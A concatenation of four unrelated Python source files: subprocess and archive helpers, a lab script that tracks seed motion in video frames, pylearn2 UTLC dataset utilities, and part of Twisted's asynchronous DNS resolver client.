return proc.returncode
def call_for_output(command, *args, **kwargs):
kwargs["stdout"] = _subprocess.PIPE
proc = start_process(command, *args, **kwargs)
output = proc.communicate()[0]
exit_code = proc.poll()
if exit_code not in (None, 0):
command_string = _command_string(command)
command_string = command_string.format(*args)
error = CalledProcessError(exit_code, command_string)
error.output = output
raise error
return output
def start_process(command, *args, **kwargs):
if _is_string(command):
command = command.format(*args)
command_args = _shlex.split(command)
command_string = command
elif isinstance(command, _collections.Iterable):
assert len(args) == 0, args
command_args = command
command_string = _command_string(command)
else:
raise Exception()
notice("Calling '{0}'", command_string)
if "shell" in kwargs and kwargs["shell"]:
proc = _Process(command_string, **kwargs)
else:
proc = _Process(command_args, **kwargs)
debug("{0} started", proc)
return proc
def _command_string(command):
if _is_string(command):
return command
elems = ["\"{0}\"".format(x) if " " in x else x for x in command]
return " ".join(elems)
class _Process(_subprocess.Popen):
def __init__(self, command, *args, **kwargs):
super(_Process, self).__init__(command, *args, **kwargs)
try:
self.name = kwargs["name"]
except KeyError:
if _is_string(command):
self.name = program_name(command)
elif isinstance(command, _collections.Iterable):
self.name = command[0]
else:
raise Exception()
def __repr__(self):
return "process {0} ({1})".format(self.pid, self.name)
def stop_process(proc):
notice("Stopping {0}", proc)
if proc.poll() is not None:
if proc.returncode == 0:
debug("{0} already exited normally", proc)
elif proc.returncode == -(_signal.SIGTERM):
notice("{0} was already terminated", proc)
else:
m = "{0} already exited with code {1}"
error(m, proc, proc.returncode)
return
proc.terminate()
return wait_for_process(proc)
def wait_for_process(proc):
debug("Waiting for {0} to exit", proc)
proc.wait()
if proc.returncode == 0:
debug("{0} exited normally", proc)
elif proc.returncode == -(_signal.SIGTERM):
notice("{0} exited after termination", proc)
else:
error("{0} exited with code {1}", proc, proc.returncode)
return proc.returncode
def make_archive(input_dir, output_dir, archive_stem):
temp_dir = make_temp_dir()
temp_input_dir = join(temp_dir, archive_stem)
copy(input_dir, temp_input_dir)
make_dir(output_dir)
output_file = "{0}.tar.gz".format(join(output_dir, archive_stem))
output_file = absolute_path(output_file)
with working_dir(temp_dir):
call("tar -czf {0} {1}", output_file, archive_stem)
return output_file
def extract_archive(archive_file, output_dir):
assert is_file(archive_file)
if not exists(output_dir):
make_dir(output_dir)
archive_file = absolute_path(archive_file)
with working_dir(output_dir):
call("tar -xf {0}", archive_file)
return output_dir
def rename_archive(archive_file, new_archive_stem):
assert is_file(archive_file)
if name_stem(archive_file) == new_archive_stem:
return archive_file
temp_dir = make_temp_dir()
extract_archive(archive_file, temp_dir)
input_name = list_dir(temp_dir)[0]
input_dir = join(temp_dir, input_name)
output_file = make_archive(input_dir, temp_dir, new_archive_stem)
output_name = file_name(output_file)
archive_dir = parent_dir(archive_file)
new_archive_file = join(archive_dir, output_name)
move(output_file, new_archive_file)
remove(archive_file)
return new_archive_file
def random_port(min=49152, max=65535):
return _random.randint(min, max)
# Modified copytree impl that allows for already existing destination
# dirs
def _copytree(src, dst, symlinks=False, ignore=None):
"""Recursively copy a directory tree using copy2().
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
XXX Consider this example code rather than the ultimate tool.
"""
names = _os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not exists(dst):
_os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = _os.path.join(src, name)
dstname = _os.path.join(dst, name)
try:
if symlinks and _os.path.islink(srcname):
linkto = _os.readlink(srcname)
_os.symlink(linkto, dstname)
elif _os.path.isdir(srcname):
_copytree(srcname, dstname, symlinks, ignore)
else:
# Will raise a SpecialFileError for unsupported file types
_shutil.copy2(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except _shutil.Error as err:
errors.extend(err.args[0])
except EnvironmentError as why:
errors.append((srcname, dstname, str(why)))
try:
_shutil.copystat(src, dst)
except OSError as why:
if _shutil.WindowsError is not None and isinstance \
(why, _shutil.WindowsError):
# Copying file access times may fail on Windows
pass
else:
errors.append((src, dst, str(why)))
if errors:
raise _shutil.Error(errors)
def _is_string(obj):
try:
return isinstance(obj, basestring)
except NameError:
return isinstance(obj, str)
| |
from scipy import misc
import os
import fnmatch
import numpy as np
import matplotlib.pyplot as plt
from scipy import ndimage
from scipy import signal
from tqdm import tqdm
import pickle
# %matplotlib inline
# images lading and processing functions ---------------------------------------
def generate_image_list(path_to_images):
list_images = []
for file_name in os.listdir(path_to_images):
if fnmatch.fnmatch(file_name, '*.png'):
list_images.append(file_name)
list_images.sort()
return list_images
def read_one_image(path_to_images, image, verbose=0):
name_image_current = path_to_images + image
image_current = misc.imread(name_image_current)
if verbose > 1:
print "Read: " + name_image_current
print "Native shape: " + str(image_current.shape)
plt.imshow(image_current)
plt.show()
return image_current
def load_all_images(list_images, dict_images, verbose=0):
for current_image_name in list_images:
dict_images[current_image_name] = read_one_image(path_to_images, current_image_name)
if verbose > 1:
print "Loaded " + current_image_name
def shape_image(image_name, dict_images, verbose=0):
shape_image = dict_images[image_name].shape
if verbose > 1:
print "Shape image: " + str(shape_image)
return shape_image
def compute_mean_image(list_images, dict_images, shape_image, image_max=-1, verbose=0):
"""
compute the mean image at each pixel, based on all images in the video
"""
if image_max > 0:
numpy_array_all_images = np.zeros((shape_image[0], shape_image[1], shape_image[2], image_max), dtype=np.uint8)
for ind_image in range(image_max):
image_name = list_images[ind_image]
numpy_array_all_images[:, :, :, ind_image] = dict_images[image_name]
else:
number_of_images = len(list_images)
numpy_array_all_images = np.zeros((shape_image[0], shape_image[1], shape_image[2], number_of_images), dtype=np.uint8)
for ind_image in range(number_of_images):
image_name = list_images[ind_image]
numpy_array_all_images[:, :, :, ind_image] = dict_images[image_name]
mean_image = np.uint8(np.floor(np.mean(numpy_array_all_images, 3)))
std_image = np.uint8(np.floor(np.std(numpy_array_all_images, 3)))
dict_images['mean_image'] = mean_image
dict_images['std_image'] = std_image
if verbose > 0:
plt.figure()
plt.imshow(mean_image)
plt.figure()
plt.imshow(std_image)
plt.show()
def compute_change_image(list_images, dict_images, image_number, plot_L2=False, verbose=0):
image_name = list_images[image_number]
image = dict_images[image_name]
mean_image = dict_images['mean_image']
std_image = dict_images['std_image']
image_difference = np.uint8(np.floor(np.abs(np.float16(image) - np.float16(mean_image))))
if plot_L2:
float_difference = L2_norm(np.float32(image_difference))
if verbose > 1:
plt.figure()
plt.imshow(image_difference)
if plot_L2:
plt.figure()
plt.pcolor(float_difference)
plt.colorbar()
plt.show()
return(image_difference)
def threshold_image(shape_image, change_image, threshold_change, verbose=0):
threshold_image = np.zeros((shape_image[0], shape_image[1]), dtype=np.uint8)
image_0 = np.float32(change_image[:, :, 0]) >= np.float32(threshold_change)
image_1 = np.float32(change_image[:, :, 1]) >= np.float32(threshold_change)
image_2 = np.float32(change_image[:, :, 2]) >= np.float32(threshold_change)
threshold_image = np.uint8(image_0 & image_1 & image_2)
if verbose > 1:
plt.figure()
plt.imshow(threshold_image)
plt.show()
return threshold_image
def plot_as_image(image):
max_image = np.max(np.max(image))
image_uint8 = np.uint8(np.floor(254.0 * image / max_image))
plt.figure()
plt.imshow(image_uint8)
print "Plot as image max: " + str(np.max(np.max(image)))
def convolve_disk(image_in, kernel_radius=10, verbose=0):
kernel = np.zeros((kernel_radius * 2, kernel_radius * 2))
for i in range(kernel_radius * 2):
for j in range(kernel_radius * 2):
if (i - kernel_radius + 1)**2 + (j - kernel_radius + 1)**2 < kernel_radius**2:
kernel[i, j] = 1
if verbose > 1:
plt.figure()
plt.imshow(kernel)
convolved = ndimage.convolve(np.float32(image_in), kernel)
if verbose > 1:
plot_as_image(convolved)
if verbose > 1:
plt.show()
return convolved
def find_pos_seed(shape_image, list_images, dict_images, image_number, identification='lowest', verbose=0, debug=False):
difference_image = compute_change_image(list_images, dict_images, image_number, plot_L2=False, verbose=verbose)
threshold_change = 40
thresholded_image = threshold_image(shape_image, difference_image, threshold_change, verbose=verbose)
convolved = convolve_disk(thresholded_image, kernel_radius=11, verbose=0)
convolved = np.uint8(255.0 * convolved / np.max(np.max(convolved)))
convolved_3_channels = np.zeros((shape_image[0], shape_image[1], shape_image[2]), dtype=np.uint8)
convolved_3_channels[:, :, 0] = np.uint8(np.floor(convolved))
convolved_3_channels[:, :, 1] = np.uint8(np.floor(convolved))
convolved_3_channels[:, :, 2] = np.uint8(np.floor(convolved))
threshold_change = 100
thresholded_image = threshold_image(shape_image, convolved_3_channels, threshold_change, verbose=verbose)
convolved = convolve_disk(thresholded_image, kernel_radius=11, verbose=verbose)
convolved = np.uint8(255.0 * convolved / np.max(np.max(convolved)))
# version to identify the lowest point of the seed
if identification == 'lowest':
index_valid = np.where(convolved > 250)
if index_valid[0].size == 0:
index_valid = ([0], [0])
position_1 = np.min(index_valid[1])
# should check if a position is detected here!
if position_1 > 0:
position_0 = int(np.floor(np.mean(np.where(convolved[:, position_1] == np.max(convolved[:, position_1])))))
position = (position_0, position_1)
else:
position_1 = 0
position_2 = 0
position = (position_1, position_2)
# version to identify the center of the seed
elif identification == 'highest':
position = np.unravel_index(convolved.argmax(), convolved.shape)
else:
print "Identification method not implemented!"
if debug:
print "position:"
print position
if not position > 0:
position = 0
if verbose > 0:
print "Found position: " + str(position)
if verbose > 1:
image_current = dict_images[list_images[image_number]]
plt.figure()
# image_current = ndimage.rotate(image_current, 90)
plt.imshow(image_current)
# plt.plot(position[0], position[1], marker='o', color='r')
plt.plot(position[1], position[0], marker='o', color='r')
plt.show()
return(position)
def find_pos_width_seed(shape_image, list_images, dict_images, image_number, pos_seed, half_width_box=150, height_box=80, verbose=0):
difference_image = compute_change_image(list_images, dict_images, image_number, verbose=verbose)
threshold_change_image = 50
thresholded_image = threshold_image(shape_image, difference_image, threshold_change_image, verbose=verbose)
pos_1 = pos_seed[0]
pos_2 = pos_seed[1]
if pos_1 == 0:
return((0, 0), (0, 0), 0)
reduced_image = thresholded_image[pos_1 - half_width_box:pos_1 + half_width_box, pos_2 - int(np.floor(height_box / 2)): pos_2 + height_box]
if verbose > 1:
plot_as_image(reduced_image)
non_zero_image = np.where(reduced_image > 0)
std_width = np.std(non_zero_image[0])
if std_width > 0:
wing_tip_1 = (non_zero_image[0][0], non_zero_image[1][0])
wing_tip_2 = (non_zero_image[0][-1], non_zero_image[1][-1])
else:
std_width = 0
wing_tip_1 = (0, 0)
wing_tip_2 = (0, 0)
if verbose > 1:
plt.figure()
plt.imshow(dict_images[list_images[image_number]])
plt.plot(pos_seed[1], pos_seed[0], marker='o', color='r')
plt.plot(wing_tip_1[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_1[0] + pos_seed[0] - half_width_box, marker='o', color='b')
plt.plot(wing_tip_2[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_2[0] + pos_seed[0] - half_width_box, marker='o', color='g')
plt.show()
return(wing_tip_1, wing_tip_2, std_width)
def plot_image_with_identified_points(list_images, dict_images, image_number, pos_seed, wing_tip_1, wing_tip_2, half_width_box=150, height_box=80):
plt.figure()
plt.imshow(dict_images[list_images[image_number]])
plt.plot(pos_seed[1], pos_seed[0], marker='o', color='r')
plt.plot(wing_tip_1[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_1[0] + pos_seed[0] - half_width_box, marker='o', color='b')
plt.plot(wing_tip_2[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_2[0] + pos_seed[0] - half_width_box, marker='o', color='g')
plt.show()
# Analysis of one folder and processing of raw results functions ----------------------
def process_folder_load(path_to_folder, verbose=0):
print "Create necessary data structure"
dict_images = {}
print "Generate image names"
list_images = generate_image_list(path_to_images)
number_of_images = len(list_images)
print "Number of images found: " + str(number_of_images)
print "Load all images"
load_all_images(list_images, dict_images, verbose=verbose)
print "Determine size images"
tuple_shape_image = shape_image(list_images[0], dict_images, verbose=verbose)
print "Compute mean image"
compute_mean_image(list_images, dict_images, tuple_shape_image, verbose=verbose)
print "Done!"
return(dict_images, list_images, number_of_images, tuple_shape_image)
def process_folder_process(path_to_folder, dict_images, list_images, number_of_images, tuple_shape_image, image_start=0, number_of_images_to_analyse=-1, verbose=0, debug=False):
print "Generate positions and width for each seed from images"
list_pos_seed = []
list_width_data_seed = []
list_true_wing_tip = []
half_width_box = 120
height_box = 80
if number_of_images_to_analyse > 0:
max_range = number_of_images_to_analyse
else:
max_range = number_of_images - image_start
for ind in tqdm(range(max_range)):
ind += image_start
if verbose > 1:
print "Locate seed in image number: " + str(ind)
position = find_pos_seed(tuple_shape_image, list_images, dict_images, ind, verbose=verbose - 2, debug=debug)
list_pos_seed.append(position)
(wing_tip_1, wing_tip_2, std_width) = find_pos_width_seed(tuple_shape_image, list_images, dict_images, ind, position, half_width_box=half_width_box, height_box=height_box, verbose=verbose - 2)
list_width_data_seed.append((wing_tip_1, wing_tip_2, std_width))
wing_tip_1_0 = wing_tip_1[1] + position[1] - int(np.floor(height_box / 2))
wing_tip_1_1 = wing_tip_1[0] + position[0] - half_width_box
wing_tip_2_0 = wing_tip_2[1] + position[1] - int(np.floor(height_box / 2))
wing_tip_2_1 = wing_tip_2[0] + position[0] - half_width_box
list_true_wing_tip.append((wing_tip_1_0, wing_tip_1_1, wing_tip_2_0, wing_tip_2_1))
if verbose > 2:
if list_width_data_seed[-1][2] > 0:
plot_image_with_identified_points(list_images, dict_images, ind, list_pos_seed[-1], list_width_data_seed[-1][0], list_width_data_seed[-1][1], half_width_box=half_width_box, height_box=height_box)
if number_of_images_to_analyse == -1:
continue_processing = raw_input("Continue? yes [y] or no [n]: ")
if continue_processing == 'n':
break
print "Done!"
return(list_pos_seed, list_width_data_seed, list_true_wing_tip)
# Calibration and fine analysis of raw results functions ---------------------------------
class generateDataOnClick:
def __init__(self, verbose=0):
self.position_on_click_accumulator = []
self.verbose = verbose
def position_on_click(self, event):
x, y = event.x, event.y
if event.button == 1:
if event.inaxes is not None:
if self.verbose > 0:
print 'data coords:' + str(event.xdata) + " , " + str(event.ydata)
self.position_on_click_accumulator.append((event.xdata, event.ydata))
plt.plot(event.xdata, event.ydata, marker='o', color='r')
plt.show()
def return_positions(self):
return self.position_on_click_accumulator
def generate_data_calibration_click(path_to_images, image, verbose=0):
if verbose > 0:
print "Load image to use for calibration"
image_calibration = read_one_image(path_to_images, image, verbose=verbose)
if verbose > 0:
print "Position of the calibration points:"
for a in position_points:
print str(a)
if verbose > 0:
print "Select all points to use for calibration and then close the figure"
plt.figure()
plt.imshow(image_calibration)
generate_data_click_object = generateDataOnClick(verbose=verbose)
plt.connect('button_press_event', generate_data_click_object.position_on_click)
plt.show()
selected_positions_pixels = generate_data_click_object.return_positions()
return selected_positions_pixels
def generate_vertical_positions_table(min, max, step, verbose=0):
vertical_positions_table = []
for value in np.arange(min, max, float(step)):
vertical_positions_table.append((0, value))
if verbose > 0:
print "Number of points generated: " + str(len(vertical_positions_table))
print "Points generated:"
for a in vertical_positions_table:
print a
return vertical_positions_table
# position_points contains the list of physical positions (x,y) in mm of the points on which the user will click
# ex: position_points = [(0,0), (0,10), (0,20)]
# NOTE: this function is ok for course use but too simplistic for 'research' use. as it uses only one
# polynomial based only on the y values instead of x = P1(pxlx, pxly) and y = P2(pxlx, pxly)
def perform_fitting_calibration_vertical(selected_positions_pixels, position_points, order=3, verbose=0, debug=False):
if not len(position_points) == len(selected_positions_pixels):
print "Problem: not the same number of mm and pxls locations!!"
y = np.asarray(selected_positions_pixels)
x = np.asarray(position_points)
if debug:
print x
print y
x = x[:, 0]
y = y[:, 1]
if debug:
print x
print y
z = np.polyfit(x, y, order)
if verbose > 1:
print "Test calibration"
plt.figure()
plt.plot(x, y, marker='o', color='r')
values_test = np.arange(0, 1200, 1.0)
poly_z = np.poly1d(z)
plt.plot(values_test, poly_z(values_test), label='calibration points')
plt.xlabel('Pixels')
plt.ylabel('Coordinates')
plt.legend(loc=2)
plt.show()
return z
def save_one_result(result_data, result_name):
with open(path + list_cases[ind_case] + '/' + result_name + '.pkl', 'w') as crrt_file:
pickle.dump(result_data, crrt_file, pickle.HIGHEST_PROTOCOL)
################################################################################
################################################################################
# Here is the code that uses all the previously defined functions to do the
# analysis; update paths, fnmatch arguments etc as needed.
path = '/media/hydroubuntu/Seagate Expansion Drive/data_lab_module_07122016/data_seed/'
# perform the calibration ------------------------------------------------------
folder = 'calibration_video.mkvDIR'
position_points = generate_vertical_positions_table(0, 600, 100, verbose=0) # do it in mm
selected_positions_pixels = generate_data_calibration_click(path + folder + '/', '00000001.png', verbose=0)
poly_fit_calibration = perform_fitting_calibration_vertical(position_points, selected_positions_pixels, order=3, verbose=2, debug=False)
print "save calibration"
np.save(path + 'poly_fit_calibration', poly_fit_calibration)
# loads the calibration --------------------------------------------------------
poly_fit_calibration = np.load(path + 'poly_fit_calibration.npy')
# load list of all cases -------------------------------------------------------
list_cases = []
for file_name in os.listdir(path):
if fnmatch.fnmatch(file_name, 'seed_*DIR'):
list_cases.append(file_name)
print "Cases to process:"
for crrt_case in list_cases:
print crrt_case
print " "
nbr_cases = len(list_cases)
print "Number of cases: " + str(nbr_cases)
# perform analysis of all cases ------------------------------------------------
for ind_case in range(nbr_cases):
print ""
print "------------------------------------------------------------"
print "Analysing case: " + str(list_cases[ind_case])
print "Case index: " + str(ind_case) + ' out of ' + str(nbr_cases)
path_to_images = path + list_cases[ind_case] + '/'
(dict_images, list_images, number_of_images, tuple_shape_image) = process_folder_load(path_to_images, verbose=0)
(list_pos_seed, list_width_data_seed, list_true_wing_tip) = process_folder_process(path_to_images, dict_images, list_images, number_of_images, tuple_shape_image, image_start=0, number_of_images_to_analyse=-1, verbose=0, debug=False)
print "Saving generated data"
save_one_result(list_pos_seed, 'list_pos_seed')
save_one_result(list_width_data_seed, 'list_width_data_seed')
save_one_result(list_true_wing_tip, 'list_true_wing_tip')
| |
"""Several utilities for experimenting upon utlc datasets"""
# Standard library imports
import logging
import os
import inspect
import zipfile
from tempfile import TemporaryFile
# Third-party imports
import numpy
import theano
from pylearn2.datasets.utlc import load_ndarray_dataset, load_sparse_dataset
from pylearn2.utils import subdict, sharedX
logger = logging.getLogger(__name__)
##################################################
# Shortcuts and auxiliary functions
##################################################
def getboth(dict1, dict2, key, default=None):
"""
Try to retrieve key from dict1 if exists, otherwise try with dict2.
If the key is not found in any of them, raise an exception.
Parameters
----------
dict1 : dict
WRITEME
dict2 : dict
WRITEME
key : WRITEME
default : WRITEME
Returns
-------
WRITEME
"""
try:
return dict1[key]
except KeyError:
if default is None:
return dict2[key]
else:
return dict2.get(key, default)
##################################################
# Datasets loading and contest facilities
##################################################
def load_data(conf):
"""
Loads a specified dataset according to the parameters in the dictionary
Parameters
----------
conf : WRITEME
Returns
-------
WRITEME
"""
logger.info('... loading dataset')
# Special case for sparse format
if conf.get('sparse', False):
expected = inspect.getargspec(load_sparse_dataset)[0][1:]
data = load_sparse_dataset(conf['dataset'], **subdict(conf, expected))
valid, test = data[1:3]
# Sparse TERRY data on LISA servers contains an extra null first row in
# valid and test subsets.
if conf['dataset'] == 'terry':
valid = valid[1:]
test = test[1:]
assert valid.shape[0] == test.shape[0] == 4096, \
'Sparse TERRY data loaded has wrong number of examples'
if len(data) == 3:
return [data[0], valid, test]
else:
return [data[0], valid, test, data[3]]
# Load as the usual ndarray
expected = inspect.getargspec(load_ndarray_dataset)[0][1:]
data = load_ndarray_dataset(conf['dataset'], **subdict(conf, expected))
# Special case for on-the-fly normalization
if conf.get('normalize_on_the_fly', False):
return data
# Allocate shared variables
def shared_dataset(data_x):
"""Function that loads the dataset into shared variables"""
if conf.get('normalize', True):
return sharedX(data_x, borrow=True)
else:
return theano.shared(theano._asarray(data_x), borrow=True)
return map(shared_dataset, data)
def save_submission(conf, valid_repr, test_repr):
"""
Create a submission file given a configuration dictionary and a
representation for valid and test.
Parameters
----------
conf : WRITEME
valid_repr : WRITEME
test_repr : WRITEME
"""
logger.info('... creating zipfile')
# Ensure the given directory is correct
submit_dir = conf['savedir']
if not os.path.exists(submit_dir):
os.makedirs(submit_dir)
elif not os.path.isdir(submit_dir):
raise IOError('savedir %s is not a directory' % submit_dir)
basename = os.path.join(submit_dir, conf['dataset'] + '_' + conf['expname'])
# If there are too much features, outputs kernel matrices
if (valid_repr.shape[1] > valid_repr.shape[0]):
valid_repr = numpy.dot(valid_repr, valid_repr.T)
test_repr = numpy.dot(test_repr, test_repr.T)
# Quantitize data
valid_repr = numpy.floor((valid_repr / valid_repr.max())*999)
test_repr = numpy.floor((test_repr / test_repr.max())*999)
# Store the representations in two temporary files
valid_file = TemporaryFile()
test_file = TemporaryFile()
numpy.savetxt(valid_file, valid_repr, fmt="%.3f")
numpy.savetxt(test_file, test_repr, fmt="%.3f")
# Reread those files and put them together in a .zip
valid_file.seek(0)
test_file.seek(0)
submission = zipfile.ZipFile(basename + ".zip", "w",
compression=zipfile.ZIP_DEFLATED)
submission.writestr(basename + '_valid.prepro', valid_file.read())
submission.writestr(basename + '_final.prepro', test_file.read())
submission.close()
valid_file.close()
test_file.close()
def create_submission(conf, transform_valid, transform_test=None, features=None):
"""
Create a submission file given a configuration dictionary and a
computation function.
Note that it always reload the datasets to ensure valid & test
are not permuted.
Parameters
----------
conf : WRITEME
transform_valid : WRITEME
transform_test : WRITEME
features : WRITEME
"""
if transform_test is None:
transform_test = transform_valid
# Load the dataset, without permuting valid and test
kwargs = subdict(conf, ['dataset', 'normalize', 'normalize_on_the_fly', 'sparse'])
kwargs.update(randomize_valid=False, randomize_test=False)
valid_set, test_set = load_data(kwargs)[1:3]
# Sparse datasets are not stored as Theano shared vars.
if not conf.get('sparse', False):
valid_set = valid_set.get_value(borrow=True)
test_set = test_set.get_value(borrow=True)
# Prefilter features, if needed.
if features is not None:
valid_set = valid_set[:, features]
test_set = test_set[:, features]
# Valid and test representations
valid_repr = transform_valid(valid_set)
test_repr = transform_test(test_set)
# Convert into text info
save_submission(conf, valid_repr, test_repr)
##################################################
# Proxies for representation evaluations
##################################################
def compute_alc(valid_repr, test_repr):
"""
Returns the ALC of the valid set VS test set
Note: This proxy won't work in the case of transductive learning
(This is an assumption) but it seems to be a good proxy in the
normal case (i.e only train on training set)
Parameters
----------
valid_repr : WRITEME
test_repr : WRITEME
Returns
-------
WRITEME
"""
# Concatenate the sets, and give different one hot labels for valid and test
n_valid = valid_repr.shape[0]
n_test = test_repr.shape[0]
_labvalid = numpy.hstack((numpy.ones((n_valid, 1)),
numpy.zeros((n_valid, 1))))
_labtest = numpy.hstack((numpy.zeros((n_test, 1)),
numpy.ones((n_test, 1))))
dataset = numpy.vstack((valid_repr, test_repr))
label = numpy.vstack((_labvalid, _labtest))
logger.info('... computing the ALC')
raise NotImplementedError("This got broken by embed no longer being "
"where it used to be (if it even still exists, I haven't "
"looked for it)")
# return embed.score(dataset, label)
def lookup_alc(data, transform):
"""
.. todo::
WRITEME
"""
valid_repr = transform(data[1].get_value(borrow=True))
test_repr = transform(data[2].get_value(borrow=True))
return compute_alc(valid_repr, test_repr)
| |
# -*- test-case-name: twisted.names.test.test_names -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Asynchronous client DNS
The functions exposed in this module can be used for asynchronous name
resolution and dns queries.
If you need to create a resolver with specific requirements, such as needing to
do queries against a particular host, the L{createResolver} function will
return an C{IResolver}.
Future plans: Proper nameserver acquisition on Windows/MacOS,
better caching, respect timeouts
@author: Jp Calderone
"""
import os
import errno
import warnings
from zope.interface import implements
# Twisted imports
from twisted.python.runtime import platform
from twisted.internet import error, defer, protocol, interfaces
from twisted.python import log, failure
from twisted.python.deprecate import getWarningMethod
from twisted.names import dns, common
class Resolver(common.ResolverBase):
"""
@ivar _waiting: A C{dict} mapping tuple keys of query name/type/class to
Deferreds which will be called back with the result of those queries.
This is used to avoid issuing the same query more than once in
parallel. This is more efficient on the network and helps avoid a
"birthday paradox" attack by keeping the number of outstanding requests
for a particular query fixed at one instead of allowing the attacker to
raise it to an arbitrary number.
@ivar _reactor: A provider of L{IReactorTCP}, L{IReactorUDP}, and
L{IReactorTime} which will be used to set up network resources and
track timeouts.
"""
implements(interfaces.IResolver)
index = 0
timeout = None
factory = None
servers = None
dynServers = ()
pending = None
connections = None
resolv = None
_lastResolvTime = None
_resolvReadInterval = 60
def _getProtocol(self):
getWarningMethod()(
"Resolver.protocol is deprecated; use Resolver.queryUDP instead.",
PendingDeprecationWarning,
stacklevel=0)
self.protocol = dns.DNSDatagramProtocol(self)
return self.protocol
protocol = property(_getProtocol)
def __init__(self, resolv=None, servers=None, timeout=(1, 3, 11, 45), reactor=None):
"""
Construct a resolver which will query domain name servers listed in
the C{resolv.conf(5)}-format file given by C{resolv} as well as
those in the given C{servers} list. Servers are queried in a
round-robin fashion. If given, C{resolv} is periodically checked
for modification and re-parsed if it is noticed to have changed.
@type servers: C{list} of C{(str, int)} or C{None}
@param servers: If not None, interpreted as a list of (host, port)
pairs specifying addresses of domain name servers to attempt to use
for this lookup. Host addresses should be in IPv4 dotted-quad
form. If specified, overrides C{resolv}.
@type resolv: C{str}
@param resolv: Filename to read and parse as a resolver(5)
configuration file.
@type timeout: Sequence of C{int}
@param timeout: Default number of seconds after which to reissue the
query. When the last timeout expires, the query is considered
failed.
@param reactor: A provider of L{IReactorTime}, L{IReactorUDP}, and
L{IReactorTCP} which will be used to establish connections, listen
for DNS datagrams, and enforce timeouts. If not provided, the
global reactor will be used.
@raise ValueError: Raised if no nameserver addresses can be found.
"""
common.ResolverBase.__init__(self)
if reactor is None:
from twisted.internet import reactor
self._reactor = reactor
self.timeout = timeout
if servers is None:
self.servers = []
else:
self.servers = servers
self.resolv = resolv
if not len(self.servers) and not resolv:
raise ValueError, "No nameservers specified"
self.factory = DNSClientFactory(self, timeout)
self.factory.noisy = 0 # Be quiet by default
self.connections = []
self.pending = []
self._waiting = {}
self.maybeParseConfig()
def __getstate__(self):
d = self.__dict__.copy()
d['connections'] = []
d['_parseCall'] = None
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.maybeParseConfig()
def maybeParseConfig(self):
if self.resolv is None:
# Don't try to parse it, don't set up a call loop
return
try:
resolvConf = file(self.resolv)
except IOError, e:
if e.errno == errno.ENOENT:
# Missing resolv.conf is treated the same as an empty resolv.conf
self.parseConfig(())
else:
raise
else:
mtime = os.fstat(resolvConf.fileno()).st_mtime
if mtime != self._lastResolvTime:
log.msg('%s changed, reparsing' % (self.resolv,))
self._lastResolvTime = mtime
self.parseConfig(resolvConf)
# Check again in a little while
self._parseCall = self._reactor.callLater(
self._resolvReadInterval, self.maybeParseConfig)
def parseConfig(self, resolvConf):
servers = []
for L in resolvConf:
L = L.strip()
if L.startswith('nameserver'):
resolver = (L.split()[1], dns.PORT)
servers.append(resolver)
log.msg("Resolver added %r to server list" % (resolver,))
elif L.startswith('domain'):
try:
self.domain = L.split()[1]
except IndexError:
self.domain = ''
self.search = None
elif L.startswith('search'):
try:
self.search = L.split()[1:]
except IndexError:
self.search = ''
self.domain = None
if not servers:
servers.append(('127.0.0.1', dns.PORT))
self.dynServers = servers
def pickServer(self):
"""
Return the address of a nameserver.
TODO: Weight servers for response time so faster ones can be
preferred.
"""
if not self.servers and not self.dynServers:
return None
serverL = len(self.servers)
dynL = len(self.dynServers)
self.index += 1
self.index %= (serverL + dynL)
if self.index < serverL:
return self.servers[self.index]
else:
return self.dynServers[self.index - serverL]
def _connectedProtocol(self):
"""
Return a new L{DNSDatagramProtocol} bound to a randomly selected port
number.
"""
if 'protocol' in self.__dict__:
# Some code previously asked for or set the deprecated `protocol`
# attribute, so it probably expects that object to be used for
# queries. Give it back and skip the super awesome source port
# randomization logic. This is actually a really good reason to
# remove this deprecated backward compatibility as soon as
# possible. -exarkun
return self.protocol
proto = dns.DNSDatagramProtocol(self)
while True:
try:
self._reactor.listenUDP(dns.randomSource(), proto)
except error.CannotListenError:
pass
else:
return proto
def connectionMade(self, protocol):
self.connections.append(protocol)
for (d, q, t) in self.pending:
self.queryTCP(q, t).chainDeferred(d)
del self.pending[:]
def messageReceived(self, message, protocol, address = None):
log.msg("Unexpected message (%d) received from %r" % (message.id, address))
def _query(self, *args):
"""
Get a new L{DNSDatagramProtocol} instance from L{_connectedProtocol},
issue a query to it using C{*args}, and arrange for it to be
disconnected from its transport after the query completes.
@param *args: Positional arguments to be passed to
L{DNSDatagramProtocol.query}.
@return: A L{Deferred} which will be called back with the result of the
query.
"""
protocol = self._connectedProtocol()
d = protocol.query(*args)
def cbQueried(result):
protocol.transport.stopListening()
return result
d.addBoth(cbQueried)
return d
def queryUDP(self, queries, timeout = None):
"""
Make a number of DNS queries via UDP.
@type queries: A C{list} of C{dns.Query} instances
@param queries: The queries to make.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
@raise C{twisted.internet.defer.TimeoutError}: When the query times
out.
"""
if timeout is None:
timeout = self.timeout
addresses = self.servers + list(self.dynServers)
if not addresses:
return defer.fail(IOError("No domain name servers available"))
# Make sure we go through servers in the list in the order they were
# specified.
addresses.reverse()
used = addresses.pop()
d = self._query(used, queries, timeout[0])
d.addErrback(self._reissue, addresses, [used], queries, timeout)
return d
def _reissue(self, reason, addressesLeft, addressesUsed, query, timeout):
reason.trap(dns.DNSQueryTimeoutError)
# If there are no servers left to be tried, adjust the timeout
